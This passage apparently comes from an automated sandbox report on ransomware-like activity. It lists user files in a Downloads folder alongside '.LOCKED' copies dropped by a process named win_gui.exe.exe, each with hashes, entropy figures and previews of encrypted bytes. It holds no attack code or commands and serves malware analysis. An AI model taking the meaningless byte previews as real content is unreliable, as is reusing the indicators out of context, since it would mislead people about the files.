                                SHA1:EDC04D5932311A487E469FB000BDC91D0543C9DC
                                SHA-256:F2DC01A3CC1AD2D959DA50DB0FC909122CFD6B6FD3BB90542823EFCB8F796A23
                                SHA-512:BE1AFCA7167BC742A7A05DF062726ED3F678746156BBF6E7D82752B3496B882657B361D71A5F5B2BF69B34ED84EE2C4C0ED740D916EC999A69A6FE0E82703619
                                Malicious:false
                                Preview:......~E..<..|....f.K......!....,.=u...:{9.0.4ic...5k0C3.....m%.....L...@f..I.~..z...&.%.v.KJ...6.....E....=...V.q.4..D..&F.6p._w0..0#..p.$&....n}Nm.."hc ..a...q....~..[..^...P.{..f..=.n.Z........l....h.~M..+.zJd...-B.b..`%;/W^...|.R.O.aW`l....f..y..._..9n...|.8k...!...z... p......u....}.g.p..u..8.F...H2u.l.d.o...x5E.......PQo..}..z........].....$...~.q0K76f...:_W.~[...Hs..7.+.F.t....9.k772...Q..\...I.......8.x....|._0v>C..c.X.)."..L.....'..Ga...=..A.~....[U.....;..y...q.....`.O..........?..+.*.aB._...E....d...o...+Ka.s..W...u.H....]...... .:Eq....i... .E.`&.....5'R5..s......N.....Z..].,z.b.x .%q....w..g..../a.G@%...fzVO...:.b.....3.n.....q$...dW..3.^..e.S...y/..seO..........+|P....[...h...%...#..../.%...+....W)H.7`wV..........c!..c7P0...e.d.~[At...@.S.4Ci......1...ye...9.MN+j.....i?7.....4DirZ.Ux7.c.~....."3NN.b......%....ql...Y.f....K..i.X...\.NG...I..v.............G'S.z.....R.E..J.'..b....*BSj.....H...e.....9....M..S$4.aEX......s&........

                                C:\Users\user\Downloads\GRXZDKKVDB.docx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.861195862831501
                                Encrypted:false
                                SSDEEP:48:nF8mkvWTu1hdbD4AC7Vhq7qEYzjmb7/WyYu+MAVMJg6T2w:ervTv/AbqGrWb7evuAVO2w
                                MD5:C61BA0EFD4FAB252ECF1F28691B4F0D5
                                SHA1:EDC04D5932311A487E469FB000BDC91D0543C9DC
                                SHA-256:F2DC01A3CC1AD2D959DA50DB0FC909122CFD6B6FD3BB90542823EFCB8F796A23
                                SHA-512:BE1AFCA7167BC742A7A05DF062726ED3F678746156BBF6E7D82752B3496B882657B361D71A5F5B2BF69B34ED84EE2C4C0ED740D916EC999A69A6FE0E82703619
                                Malicious:false
                                Preview:......~E..<..|....f.K......!....,.=u...:{9.0.4ic...5k0C3.....m%.....L...@f..I.~..z...&.%.v.KJ...6.....E....=...V.q.4..D..&F.6p._w0..0#..p.$&....n}Nm.."hc ..a...q....~..[..^...P.{..f..=.n.Z........l....h.~M..+.zJd...-B.b..`%;/W^...|.R.O.aW`l....f..y..._..9n...|.8k...!...z... p......u....}.g.p..u..8.F...H2u.l.d.o...x5E.......PQo..}..z........].....$...~.q0K76f...:_W.~[...Hs..7.+.F.t....9.k772...Q..\...I.......8.x....|._0v>C..c.X.)."..L.....'..Ga...=..A.~....[U.....;..y...q.....`.O..........?..+.*.aB._...E....d...o...+Ka.s..W...u.H....]...... .:Eq....i... .E.`&.....5'R5..s......N.....Z..].,z.b.x .%q....w..g..../a.G@%...fzVO...:.b.....3.n.....q$...dW..3.^..e.S...y/..seO..........+|P....[...h...%...#..../.%...+....W)H.7`wV..........c!..c7P0...e.d.~[At...@.S.4Ci......1...ye...9.MN+j.....i?7.....4DirZ.Ux7.c.~....."3NN.b......%....ql...Y.f....K..i.X...\.NG...I..v.............G'S.z.....R.E..J.'..b....*BSj.....H...e.....9....M..S$4.aEX......s&........

                                C:\Users\user\Downloads\GRXZDKKVDB.pdf

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.885035934167579
                                Encrypted:false
                                SSDEEP:48:XpY4Z4ABfkL8o6dN1y1NkEAJi/WyYu+MAVMJg6Tza:XpYi4LLu16NevuAVOza
                                MD5:CFDA2D392C7FD5BC3A24A7010E0E840D
                                SHA1:4C5017FE67A9A6FFE600CD28C2A9D617CB61A015
                                SHA-256:0784D5359E05DCEBB04B3FBE37CF0F8CE49E8E022D58C62A63A9DE309C833502
                                SHA-512:5CEF6A85E6442C60E88E047FD977F69A7319DA4AF9D2002055CA3BC4C2B8C8A34EA79E47AACA2848CAC79C769D9DD33F468C9317EC2DA81B56AA1375789AF862
                                Malicious:false
                                Preview:.qq.e..e#L....8.Wt4$.x...U..1.a.;3..f...-.$z.....e2....[.5..'x.|Y...-.N...(..C.p2BH`.0..F)....&.n.A.*.......UN.^t<s.....$).s.G"|.U+..fQ=A.b[b.fM.u...*|'.-.j<.H.....q.&..Q..o....T.%..]...+...+....W=[..(...`...bH....}......4....._V:4..{&.2}!......QT....^.K......Z.^.r..................5.,....G..~)y.....cqa..G....~.9...a.I&>*.ZBK..d?....u../......<....../g..1q2.....ac0e.._.K1."@..EcB.!..o...($.G..:..=.a.{J.[.>F1P....el........F....>...l.e^.{U.[.....8!..I.T{..H&D.!...,/....r..-t.).Am...ZzH.=;........Tu7.f..B...W....|6.r.j.......S\..y..uF}-....w^...7.!YW.....n...q.%.S.+B..N.3..S.h....l..OY....$C.or.cj..%...T....zRdL5.......O.D..nX6..........p.?....v.b.....2I."vf3..T.......t.S...........E~......;.D.....C.#.6..'..&...a ..f.>....Z;........6........H.X....~.QH..f.z.P.Yh...@...]H..5f.[...../.'.%t.kk.&.....]..#0.mu.h.O..^.,9W.(rWD.q.$.S-..c....#..d..AV..X...?..t.I5..]...;....F.1G...n..V.;=.7ixel.nI.#e..d~j.:...[I...[M....%.b+..7f....2..i

                                C:\Users\user\Downloads\GRXZDKKVDB.pdf.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.885035934167579
                                Encrypted:false
                                SSDEEP:48:XpY4Z4ABfkL8o6dN1y1NkEAJi/WyYu+MAVMJg6Tza:XpYi4LLu16NevuAVOza
                                MD5:CFDA2D392C7FD5BC3A24A7010E0E840D
                                SHA1:4C5017FE67A9A6FFE600CD28C2A9D617CB61A015
                                SHA-256:0784D5359E05DCEBB04B3FBE37CF0F8CE49E8E022D58C62A63A9DE309C833502
                                SHA-512:5CEF6A85E6442C60E88E047FD977F69A7319DA4AF9D2002055CA3BC4C2B8C8A34EA79E47AACA2848CAC79C769D9DD33F468C9317EC2DA81B56AA1375789AF862
                                Malicious:false
                                Preview:.qq.e..e#L....8.Wt4$.x...U..1.a.;3..f...-.$z.....e2....[.5..'x.|Y...-.N...(..C.p2BH`.0..F)....&.n.A.*.......UN.^t<s.....$).s.G"|.U+..fQ=A.b[b.fM.u...*|'.-.j<.H.....q.&..Q..o....T.%..]...+...+....W=[..(...`...bH....}......4....._V:4..{&.2}!......QT....^.K......Z.^.r..................5.,....G..~)y.....cqa..G....~.9...a.I&>*.ZBK..d?....u../......<....../g..1q2.....ac0e.._.K1."@..EcB.!..o...($.G..:..=.a.{J.[.>F1P....el........F....>...l.e^.{U.[.....8!..I.T{..H&D.!...,/....r..-t.).Am...ZzH.=;........Tu7.f..B...W....|6.r.j.......S\..y..uF}-....w^...7.!YW.....n...q.%.S.+B..N.3..S.h....l..OY....$C.or.cj..%...T....zRdL5.......O.D..nX6..........p.?....v.b.....2I."vf3..T.......t.S...........E~......;.D.....C.#.6..'..&...a ..f.>....Z;........6........H.X....~.QH..f.z.P.Yh...@...]H..5f.[...../.'.%t.kk.&.....]..#0.mu.h.O..^.,9W.(rWD.q.$.S-..c....#..d..AV..X...?..t.I5..]...;....F.1G...n..V.;=.7ixel.nI.#e..d~j.:...[I...[M....%.b+..7f....2..i

                                C:\Users\user\Downloads\HMPPSXQPQV.mp3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.873682634584006
                                Encrypted:false
                                SSDEEP:48:4anBglLiSzpam+sg2z/WyYu+MAVMJg6Td:4dvaN2zevuAVOd
                                MD5:064CF08209BB8F4E592D3E14BF0015E4
                                SHA1:B623AC5EF28D62108E0717D186BFEBD3FA27F867
                                SHA-256:C906E67AFC49EBA42459F25EC8BF108476A4FF4530BD8935A5B49AA16E62BD63
                                SHA-512:A8CD900C21A7688B08B4D0EE7863AB8059D4A8C5516873F6F70E83BFA4AEBEDEE34E391349A57A0840EAF091FC1125D2205A1C5C4B686274F6515B14CC7149C6
                                Malicious:false
                                Preview:\#h.+ .....)DA..#......F#..(..........<.,........Y..g....[.<........Ch.....\.q.,s{c.H...yUG......F...@...A..@.f.<...C..i.u...\.t...qo.H.&n.p..;..T....Xe......]N..!e......'..%.. ........._<.....bwZ.......Q...%.j.D.....f.....o.....e. .{..<]..(+cy.C.....d.....,..9.....2.....@./|..E.I)a. ...=..-..S ......^0..\G..]..@>.j..:.F!.._.....W:....Z>.tx)>B .Z...,~].X@o...E../..6..jG.v.G.ls.f....T5.5.]:F...U...I....N.ZlS#.T..C....#.>..;B.|..($..7VX.a-..I........RR..=....9......'w..#...{.c.Uw....S..n.~.........n$.......+;. ..#...p....n..?3.....n.3+....;......&b.7..........s...Q....|v....$O. X.........|......(&.*.+Oqm_.+..%z.~.a.9(/H/.F.P..P......E....N...K|%. .....f.vx.E.u.OS..[x..a.e..$.xr[...E.l..V....p..~.Q...&>~..x@.N.;... ..lX.q:i..q.....ygu...c..a....o'.A..Sw....a....jm..J...0.Dv..9./..[].r.2...,.L.v(.....p..gS~..~....!...f.A...:...`0.E P.?./.=p.-..i.zNs..6...@..'..Dt#.D..."Eu..(\....C..d.....X!..].la.Wn%`/.. P....."...t......d.S.ugi.....J.R).....eS.

                                C:\Users\user\Downloads\HMPPSXQPQV.mp3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.873682634584006
                                Encrypted:false
                                SSDEEP:48:4anBglLiSzpam+sg2z/WyYu+MAVMJg6Td:4dvaN2zevuAVOd
                                MD5:064CF08209BB8F4E592D3E14BF0015E4
                                SHA1:B623AC5EF28D62108E0717D186BFEBD3FA27F867
                                SHA-256:C906E67AFC49EBA42459F25EC8BF108476A4FF4530BD8935A5B49AA16E62BD63
                                SHA-512:A8CD900C21A7688B08B4D0EE7863AB8059D4A8C5516873F6F70E83BFA4AEBEDEE34E391349A57A0840EAF091FC1125D2205A1C5C4B686274F6515B14CC7149C6
                                Malicious:false
                                Preview:\#h.+ .....)DA..#......F#..(..........<.,........Y..g....[.<........Ch.....\.q.,s{c.H...yUG......F...@...A..@.f.<...C..i.u...\.t...qo.H.&n.p..;..T....Xe......]N..!e......'..%.. ........._<.....bwZ.......Q...%.j.D.....f.....o.....e. .{..<]..(+cy.C.....d.....,..9.....2.....@./|..E.I)a. ...=..-..S ......^0..\G..]..@>.j..:.F!.._.....W:....Z>.tx)>B .Z...,~].X@o...E../..6..jG.v.G.ls.f....T5.5.]:F...U...I....N.ZlS#.T..C....#.>..;B.|..($..7VX.a-..I........RR..=....9......'w..#...{.c.Uw....S..n.~.........n$.......+;. ..#...p....n..?3.....n.3+....;......&b.7..........s...Q....|v....$O. X.........|......(&.*.+Oqm_.+..%z.~.a.9(/H/.F.P..P......E....N...K|%. .....f.vx.E.u.OS..[x..a.e..$.xr[...E.l..V....p..~.Q...&>~..x@.N.;... ..lX.q:i..q.....ygu...c..a....o'.A..Sw....a....jm..J...0.Dv..9./..[].r.2...,.L.v(.....p..gS~..~....!...f.A...:...`0.E P.?./.=p.-..i.zNs..6...@..'..Dt#.D..."Eu..(\....C..d.....X!..].la.Wn%`/.. P....."...t......d.S.ugi.....J.R).....eS.

                                C:\Users\user\Downloads\KLIZUSIQEN.jpg

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.867527238023455
                                Encrypted:false
                                SSDEEP:48:C7zQCU4Xv5l1eYLHg3J4/WyYu+MAVMJg6Tj:C3QR81eEHgqevuAVOj
                                MD5:88CFCAC1FE80E2442B250633DAC9B650
                                SHA1:2B76C55D8DCA9C563A287D88B76973F935ADBDCC
                                SHA-256:2D051E3D5542F6CCC74AD20763EEDF3C47EC35EB65BED88F6A8F3485C6203A3B
                                SHA-512:A05F168853800F1FAA60DFC32E611D29E5CB5E1349D745D3D685D0B76DCD2D6CFE997DCED27D44AC11C0B630FC3DBC75FE2B6DFDC145118498DFC87F985DACDD
                                Malicious:false
                                Preview:..n..V`#lG.`e.....F.#.*$.]C..*).%.C..tH...1.Z<..(..?.{....q6...rK..t.f1Ab)Q......[....Rb}r.Jv8P#..<..]..[?k.9..d..84........D]..."?..z.b|....G(.v...Um.L.....q..qyRmDpU.....Tq>#&iU.%r....w&...wM..|.W.(N.....E.....0~S........1..........8...e.O2....!d.+.....FN....t.1..(.e...g&.r...&.n."..0...&....w.y.<.g...R.ew{?.s].x....eq.>...e/....>...=.r.C.^..@.=..-........MV&.Y..b.....5!|.=..W..y.ygYps.ZO.._.na..*.8..zZ....Sn..A...._...;...{p.>...S.9...K...P....-aR...;......!..].........]m.V{..u:X-.k....L..W.mx.g...._%L{H.....S..Ct{..s..ZXQe.:h.8ei....u.'..<u..-.\....9..aN,.c.......o....mD\....~.Z.....#.gF..K@.....:...../p..+....JJ....gb.k.Lj.u+....N.;s.i.:.b`2...{..t/hk..r..@9...e. !..6E...R..(.}...ud..O....;.FG?...}.[.."...q..]..j......h[..c.4l....\..8..>~...g.#6..x.t.@.@./..x0.......C.S..g:.Z"..S.{....\*P....V...I.%=.t6.Vg....~.$.D.A...hfG.[a.y....k.q..\...N.1..yn2..amR........\J........S.}Hia|AS..s.a.t$.L.9f..g.c...aa..x.1..m0_.ekA..V....U....O...+...Kz.E.

                                C:\Users\user\Downloads\KLIZUSIQEN.jpg.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.867527238023455
                                Encrypted:false
                                SSDEEP:48:C7zQCU4Xv5l1eYLHg3J4/WyYu+MAVMJg6Tj:C3QR81eEHgqevuAVOj
                                MD5:88CFCAC1FE80E2442B250633DAC9B650
                                SHA1:2B76C55D8DCA9C563A287D88B76973F935ADBDCC
                                SHA-256:2D051E3D5542F6CCC74AD20763EEDF3C47EC35EB65BED88F6A8F3485C6203A3B
                                SHA-512:A05F168853800F1FAA60DFC32E611D29E5CB5E1349D745D3D685D0B76DCD2D6CFE997DCED27D44AC11C0B630FC3DBC75FE2B6DFDC145118498DFC87F985DACDD
                                Malicious:false
                                Preview:..n..V`#lG.`e.....F.#.*$.]C..*).%.C..tH...1.Z<..(..?.{....q6...rK..t.f1Ab)Q......[....Rb}r.Jv8P#..<..]..[?k.9..d..84........D]..."?..z.b|....G(.v...Um.L.....q..qyRmDpU.....Tq>#&iU.%r....w&...wM..|.W.(N.....E.....0~S........1..........8...e.O2....!d.+.....FN....t.1..(.e...g&.r...&.n."..0...&....w.y.<.g...R.ew{?.s].x....eq.>...e/....>...=.r.C.^..@.=..-........MV&.Y..b.....5!|.=..W..y.ygYps.ZO.._.na..*.8..zZ....Sn..A...._...;...{p.>...S.9...K...P....-aR...;......!..].........]m.V{..u:X-.k....L..W.mx.g...._%L{H.....S..Ct{..s..ZXQe.:h.8ei....u.'..<u..-.\....9..aN,.c.......o....mD\....~.Z.....#.gF..K@.....:...../p..+....JJ....gb.k.Lj.u+....N.;s.i.:.b`2...{..t/hk..r..@9...e. !..6E...R..(.}...ud..O....;.FG?...}.[.."...q..]..j......h[..c.4l....\..8..>~...g.#6..x.t.@.@./..x0.......C.S..g:.Z"..S.{....\*P....V...I.%=.t6.Vg....~.$.D.A...hfG.[a.y....k.q..\...N.1..yn2..amR........\J........S.}Hia|AS..s.a.t$.L.9f..g.c...aa..x.1..m0_.ekA..V....U....O...+...Kz.E.

                                C:\Users\user\Downloads\KLIZUSIQEN.mp3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.886944878320974
                                Encrypted:false
                                SSDEEP:48:rae46XLZIi16tnZZJCnegB7nEi0/WyYu+MAVMJg6T+ucl:+eXLZzIZX6eUMevuAVO+H
                                MD5:BFD580AB21C3B6CE2C07672301F2DC8E
                                SHA1:1F106C84BEBA2526440B0862D30FA657F4FF2C13
                                SHA-256:7A21B1757EB664EDC1D52673FD21B8CA0609F52EB196261EF8EFBAD37280D0CA
                                SHA-512:A945EB888859681537F6B6161E57E7163D8F583445DB63CC5A3DBD519650C5190F16160F3CC44EC3C1FF7D3B4B5D1056346374DF08A6689EFF084E19624121E0
                                Malicious:false
                                Preview:...].>i....B.,.p..\.QDsp..q.....A..Mj%g...{......~.y......=[......sm'...|S0..("E.h...r....c.Zz..o......[m>...'6....0..m....J;.T[p......5=..-=*c$h."f..;.rBa.....P...Xye.:r|.,........c `......C.=.#kB...4jk.L@z%.,w}....~.!5.f..dy.....1Kcv' ^_......@*..^..-...T.....s...yG.#..<.YC.--..y.e Z..^.f.Rq/.q>X...kQq.!...W.A.?Pd&..l.....,I.@v...T............U:QA.n>.I$.y6'.....p...OZ...XP.bO!....r.r.{..W.s=b........b..."..B..nf.1...|t%...t..cX....F..ueC.o4.i..6..!.W........|N.Hv.HY..O....j.".0..b...B.~J..Lm.O.WNq.a....W../...l...^v.. .S....2R.N..g..FK...u~ .M..4....5EL.{.Yli.J....1.I..F.3h^^.~.. .R..m..>*.Jj...;.W....*.[..i.......r......Vd..+....m1.~.#qi...b.Z....h.H...(.w-.......m*R..u.r.0...5....h.......0X}.M..X...w.o..s$.f'x-.t.......s..R.d>....[.*...l.-.TK.p..xb.`-....:..d.rix8..D....xL......`..4.B...+......R....84W.BO.q. .Kdk.DdI .!;.E6....1...4Y1.m6...2....p.8;v...... .."...v.!...~.7.}.'k8.O.T.Ua....U/.|..u<.F..j.B.`\s.....9&.7.AG%.{h#R

                                C:\Users\user\Downloads\KLIZUSIQEN.mp3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.886944878320974
                                Encrypted:false
                                SSDEEP:48:rae46XLZIi16tnZZJCnegB7nEi0/WyYu+MAVMJg6T+ucl:+eXLZzIZX6eUMevuAVO+H
                                MD5:BFD580AB21C3B6CE2C07672301F2DC8E
                                SHA1:1F106C84BEBA2526440B0862D30FA657F4FF2C13
                                SHA-256:7A21B1757EB664EDC1D52673FD21B8CA0609F52EB196261EF8EFBAD37280D0CA
                                SHA-512:A945EB888859681537F6B6161E57E7163D8F583445DB63CC5A3DBD519650C5190F16160F3CC44EC3C1FF7D3B4B5D1056346374DF08A6689EFF084E19624121E0
                                Malicious:false
                                Preview:...].>i....B.,.p..\.QDsp..q.....A..Mj%g...{......~.y......=[......sm'...|S0..("E.h...r....c.Zz..o......[m>...'6....0..m....J;.T[p......5=..-=*c$h."f..;.rBa.....P...Xye.:r|.,........c `......C.=.#kB...4jk.L@z%.,w}....~.!5.f..dy.....1Kcv' ^_......@*..^..-...T.....s...yG.#..<.YC.--..y.e Z..^.f.Rq/.q>X...kQq.!...W.A.?Pd&..l.....,I.@v...T............U:QA.n>.I$.y6'.....p...OZ...XP.bO!....r.r.{..W.s=b........b..."..B..nf.1...|t%...t..cX....F..ueC.o4.i..6..!.W........|N.Hv.HY..O....j.".0..b...B.~J..Lm.O.WNq.a....W../...l...^v.. .S....2R.N..g..FK...u~ .M..4....5EL.{.Yli.J....1.I..F.3h^^.~.. .R..m..>*.Jj...;.W....*.[..i.......r......Vd..+....m1.~.#qi...b.Z....h.H...(.w-.......m*R..u.r.0...5....h.......0X}.M..X...w.o..s$.f'x-.t.......s..R.d>....[.*...l.-.TK.p..xb.`-....:..d.rix8..D....xL......`..4.B...+......R....84W.BO.q. .Kdk.DdI .!;.E6....1...4Y1.m6...2....p.8;v...... .."...v.!...~.7.}.'k8.O.T.Ua....U/.|..u<.F..j.B.`\s.....9&.7.AG%.{h#R

                                C:\Users\user\Downloads\KLIZUSIQEN.pdf

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.878821345888607
                                Encrypted:false
                                SSDEEP:48:bDH7XckKBAX9+Nb6uuIRDy7/WyYu+MAVMJg6Tjk:f4PA665IRDuevuAVOY
                                MD5:2B0D8A1DF2DA7DE47394BD5C802CD20A
                                SHA1:8A844DF3C2729B90A43505C6208FD205DDA2E2A1
                                SHA-256:35AE902D8A3FA40726324C5AAD4239BC801FBC8E9B331323E9980B8E2CE717D5
                                SHA-512:D3E7183326D10075E34A16918B78525B09FE990E0FEF47834BBDEDE86DDD4E82061652DC41E449B02C19CA43052D96EC133CD6801FE8D49199CFD8C2C3BA7924
                                Malicious:false
                                Preview:W.>T%}b......$.%.442.#.nI.?...'.W.M...v.f5h@...(...'K.L.J.@.k?1..b.}.V>.{RX{l}...2pI.!...!..K..|jwE!25g%._......N.=k...F..O..m...,.,.i ...E1...3Ut...^.Y.......hH...q.<.z.....*.{.`.=..:N.Q..G.y.#b-.D..+e.f+.c=.j..%.....KDV.\.}R..Q.U.d.~.d.G89.9......xl....2..C.2..#..r,kyq.L.N.].<..`..q.l.yg.....Sg......P;.=.dH.ns.uO..........S.yc;...?3...g..s.\..,Z.va..c"A..I...._.Q....|_"-.C..c..T.`.."..lv.3.#...q@....6...E...(.m...aj..u..$.&A`s........8Qt.u.wj..L...........'.U>.{aB....e.=....Y...r!..[*..ZMt.'Z.,..2...n.d...t..........=..%]...I.?..Y...z.@...GT.9g.L... ..GP-...!.^mm.A.....K}@-*.....PV.c....<Gu.2K..NX.L.[.T.....X..F|....#.2...oK...o..Pg/~vz....;]"...>.}1.P..........R.r..i+2*gf.....,.,o.......~....1U.h...y.F!.h.i..I.6...>..e:.H..}.Q+Q..'r_..#.e[...v...tIF.....M.!ij..9....[.R.......b.......K........P.{....I.Iw...8.&WO...eA..4....ZI......P..n.E..c...~i..s.`....!.Jp3... .G}./....2........<..W....JH*.C....m.P..57.1..qp..{BJ..p..J4

                                C:\Users\user\Downloads\KLIZUSIQEN.pdf.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.878821345888607
                                Encrypted:false
                                SSDEEP:48:bDH7XckKBAX9+Nb6uuIRDy7/WyYu+MAVMJg6Tjk:f4PA665IRDuevuAVOY
                                MD5:2B0D8A1DF2DA7DE47394BD5C802CD20A
                                SHA1:8A844DF3C2729B90A43505C6208FD205DDA2E2A1
                                SHA-256:35AE902D8A3FA40726324C5AAD4239BC801FBC8E9B331323E9980B8E2CE717D5
                                SHA-512:D3E7183326D10075E34A16918B78525B09FE990E0FEF47834BBDEDE86DDD4E82061652DC41E449B02C19CA43052D96EC133CD6801FE8D49199CFD8C2C3BA7924
                                Malicious:false
                                Preview:W.>T%}b......$.%.442.#.nI.?...'.W.M...v.f5h@...(...'K.L.J.@.k?1..b.}.V>.{RX{l}...2pI.!...!..K..|jwE!25g%._......N.=k...F..O..m...,.,.i ...E1...3Ut...^.Y.......hH...q.<.z.....*.{.`.=..:N.Q..G.y.#b-.D..+e.f+.c=.j..%.....KDV.\.}R..Q.U.d.~.d.G89.9......xl....2..C.2..#..r,kyq.L.N.].<..`..q.l.yg.....Sg......P;.=.dH.ns.uO..........S.yc;...?3...g..s.\..,Z.va..c"A..I...._.Q....|_"-.C..c..T.`.."..lv.3.#...q@....6...E...(.m...aj..u..$.&A`s........8Qt.u.wj..L...........'.U>.{aB....e.=....Y...r!..[*..ZMt.'Z.,..2...n.d...t..........=..%]...I.?..Y...z.@...GT.9g.L... ..GP-...!.^mm.A.....K}@-*.....PV.c....<Gu.2K..NX.L.[.T.....X..F|....#.2...oK...o..Pg/~vz....;]"...>.}1.P..........R.r..i+2*gf.....,.,o.......~....1U.h...y.F!.h.i..I.6...>..e:.H..}.Q+Q..'r_..#.e[...v...tIF.....M.!ij..9....[.R.......b.......K........P.{....I.Iw...8.&WO...eA..4....ZI......P..n.E..c...~i..s.`....!.Jp3... .G}./....2........<..W....JH*.C....m.P..57.1..qp..{BJ..p..J4

                                C:\Users\user\Downloads\NVWZAPQSQL.docx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.879165403010126
                                Encrypted:false
                                SSDEEP:48:z/twGAwC3ag1weVb01+zYjWeFu2OV/WyYu+MAVMJg6Thc:zV8GgnQXWeFu2OVevuAVOhc
                                MD5:875C4D6319995B46F29FE73D1DE7DE17
                                SHA1:038CCF81303A2543A83C41B1FBA25BE7F57A96B9
                                SHA-256:8D8E9C7E85FF62C6CF3B1EAD92E8924DA9005480DE1EF9B475F7C74504CCC671
                                SHA-512:B9475F7B12E55CB51E81CB613E50A33BDF1112027C947D4FB644581AF2F80AAD3AA16E9DA8A4654A8DC1BC76580F1128B9ADC3CB786CC7E75664440AC637090A
                                Malicious:false
                                Preview:..6!L.p.6Qz.!.."d....\?....g.l....Te.{..1....W.:..t.1.Y.2F....s.V .$<...qH*)g&TjDw-!.]....8+.....u.d.@......V4Q..,.q4ci..|...b3$d.. ..(.j.%.Y.......V..=w.u.O....`..@...>^.2.S.M..p+4.[...P.S..2.H|\..-.)...A-.E....IXH:..$.:H.vR..rV......#..qC.l...+...4....... .a!..W....e}z.pF.^.@...I...{.+.72=c..PCJ.....1.............(..u..Z....S....(.:.Ug...5n..q8Nb....'Q.........9.z..*.A?.[.}6..~8 ..nsTP......=....z..$.e...v.U..... ..&A.<.6.I..;............e....k.vz^!"5.{..4..V...I....j..i..<.>.u*...#.+.E.....p.C....j<..`.0..@..,rL...Cp....T.ro.....>RM>Lo..&...._..Y.....gx...H.'h..Z....R.wO.....z8......`.:..v.*..?5/....'....._A.z.P@I..?.Q...[q.C78.7]J.C.`...<9....oN.rUR8.vt`HB....w.]..n..Z....p_..D.b.FU...p...:h......!..}.T.#I#....}\sl...E-iJg*..u.m.EF.q..j.wG..{]..$..f.\K..6......|.n...Mu.AI.....7|.6...t.&Z;...n....s./..a............./....<qxb....=.+....2.w.i~..A..!...QE.#.')..q.G.D..b....0.K.Gy....=.9. .71v.D.].r...&r.@..K.0p)y.-2.W....).T.*(..

                                C:\Users\user\Downloads\NVWZAPQSQL.docx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.879165403010126
                                Encrypted:false
                                SSDEEP:48:z/twGAwC3ag1weVb01+zYjWeFu2OV/WyYu+MAVMJg6Thc:zV8GgnQXWeFu2OVevuAVOhc
                                MD5:875C4D6319995B46F29FE73D1DE7DE17
                                SHA1:038CCF81303A2543A83C41B1FBA25BE7F57A96B9
                                SHA-256:8D8E9C7E85FF62C6CF3B1EAD92E8924DA9005480DE1EF9B475F7C74504CCC671
                                SHA-512:B9475F7B12E55CB51E81CB613E50A33BDF1112027C947D4FB644581AF2F80AAD3AA16E9DA8A4654A8DC1BC76580F1128B9ADC3CB786CC7E75664440AC637090A
                                Malicious:false
                                Preview:..6!L.p.6Qz.!.."d....\?....g.l....Te.{..1....W.:..t.1.Y.2F....s.V .$<...qH*)g&TjDw-!.]....8+.....u.d.@......V4Q..,.q4ci..|...b3$d.. ..(.j.%.Y.......V..=w.u.O....`..@...>^.2.S.M..p+4.[...P.S..2.H|\..-.)...A-.E....IXH:..$.:H.vR..rV......#..qC.l...+...4....... .a!..W....e}z.pF.^.@...I...{.+.72=c..PCJ.....1.............(..u..Z....S....(.:.Ug...5n..q8Nb....'Q.........9.z..*.A?.[.}6..~8 ..nsTP......=....z..$.e...v.U..... ..&A.<.6.I..;............e....k.vz^!"5.{..4..V...I....j..i..<.>.u*...#.+.E.....p.C....j<..`.0..@..,rL...Cp....T.ro.....>RM>Lo..&...._..Y.....gx...H.'h..Z....R.wO.....z8......`.:..v.*..?5/....'....._A.z.P@I..?.Q...[q.C78.7]J.C.`...<9....oN.rUR8.vt`HB....w.]..n..Z....p_..D.b.FU...p...:h......!..}.T.#I#....}\sl...E-iJg*..u.m.EF.q..j.wG..{]..$..f.\K..6......|.n...Mu.AI.....7|.6...t.&Z;...n....s./..a............./....<qxb....=.+....2.w.i~..A..!...QE.#.')..q.G.D..b....0.K.Gy....=.9. .71v.D.].r...&r.@..K.0p)y.-2.W....).T.*(..

                                C:\Users\user\Downloads\NWCXBPIUYI.mp3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.868520355289455
                                Encrypted:false
